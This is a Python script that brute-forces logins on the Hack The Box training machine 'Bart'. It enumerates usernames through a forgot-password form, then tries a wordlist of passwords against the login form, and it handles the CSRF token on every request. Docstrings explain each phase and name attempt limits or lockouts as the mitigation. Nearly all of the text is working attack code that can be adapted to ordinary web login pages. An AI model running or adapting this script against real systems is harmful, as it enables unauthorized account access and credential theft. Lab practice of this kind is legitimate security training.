Credential brute-force with CSRF-token handling

import requests
from bs4 import BeautifulSoup

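pw_forget_url = 'http://bart.htb/monitor/?action=forgot'
url = 'http://monitor.bart.htb'

# Both wordlists are read up front and the handles closed right away; the
# original opened them and never closed them, leaving two file descriptors
# open for the life of the script. `lines` holds candidate usernames,
# `plines` candidate passwords, one per line (newline still attached).
with open("users") as f:
    lines = f.readlines()

with open("cewl-wordlist.txt") as p:  # cewl -w cewl-wordlist.txt -e -a http://forum.bart.htb
    plines = p.readlines()

# Create a session to maintain cookies across the GET/POST pairs below.
s = requests.Session()

# Only an http proxy is configured; both URLs above are plain http, so the
# verify=False passed on every request is a no-op (no TLS is negotiated).
proxies = {"http": "http://127.0.0.1:8080"}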


def user_brute():
    """Enumerate valid usernames through the forgot-password form.

    For every entry in the module-level ``lines`` list this issues one GET
    on ``pw_forget_url`` to pick up the hidden ``csrf`` input, then one POST
    of that token plus the candidate ``user_name``. A reply containing the
    text "An email" is counted as a valid account. Returns the matching
    names as a list, in input order.

    Reviewer notes: ``csrf`` is only bound when the GET returns 200 and the
    hidden input is present; on any other outcome the POST below raises
    NameError (same as the original). ``{candidate}`` in the "User found"
    print is a one-element set, so the name is printed in set notation.
    From the server side this is one GET + one POST per candidate over a
    single cookie session; an attempt limit or per-IP lockout on the
    forgot-password endpoint is the mitigation.
    """
    found = []
    for raw in lines:
        candidate = raw.strip()  # drop the trailing newline
        page = s.get(pw_forget_url, proxies=proxies, verify=False)
        if page.status_code != 200:
            print(f"Failed to retrieve the page. Status code: {page.status_code}")
        else:
            token_field = BeautifulSoup(page.text, 'html.parser').find('input', {'name': 'csrf'})
            if token_field is None:
                print("CSRF token input not found in the HTML.")
            else:
                csrf = token_field['value']

        reply = s.post(
            pw_forget_url,
            data={"csrf": csrf, "user_name": candidate},
            proxies=proxies,
            verify=False,
        )
        if "An email" in reply.text:
            print(f"[+] User found: ", {candidate})
            found.append(candidate)

    return found

# Account targeted by pw_brute(). Per the author, user_brute() reported two
# valid names on this box and harvey was picked; the other one can be
# substituted here if this wordlist does not hit.
username = "harvey"

def pw_brute():
    """Try every password in ``plines`` against ``username`` on the login form.

    The page at ``url`` is fetched once, before the loop, and that same
    response is re-parsed on every iteration, so one ``csrf`` value is
    reused for all attempts. Each attempt POSTs csrf / user_name /
    user_password / action=login. Any reply whose body does not contain
    "The information is incorrect." is taken as a hit and that password is
    returned (so an unexpected error page would also read as a hit).
    Returns False when the list is exhausted.

    Reviewer notes: ``username`` is the module-level value, not a
    parameter. ``csrf`` stays unbound if the initial GET did not return 200
    with the hidden input, in which case the POST raises NameError (same as
    the original). Defensively, the weakness exercised here is a login
    endpoint that accepts an unbounded number of attempts on one session;
    an attempt counter or lockout closes it.
    """
    page = s.get(url, proxies=proxies, verify=False)
    for raw in plines:
        pw = raw.strip()
        if page.status_code != 200:
            print(f"Failed to retrieve the page. Status code: {page.status_code}")
        else:
            token_field = BeautifulSoup(page.text, 'html.parser').find('input', {'name': 'csrf'})
            if token_field is None:
                print("CSRF token input not found in the HTML.")
            else:
                csrf = token_field['value']

        attempt = {
            "csrf": csrf,
            "user_name": username,
            "user_password": pw,
            "action": "login",
        }
        reply = s.post(url, data=attempt, proxies=proxies, verify=False)
        if "The information is incorrect." not in reply.text:
            print(f"[+] Password Found:  {pw}")
            return pw

    return False


#user_brute()
# Script entry point: only the password phase runs; user_brute() is left
# commented out because it was already run once to choose ``username``
# (see the comment on that assignment).
pw_brute()
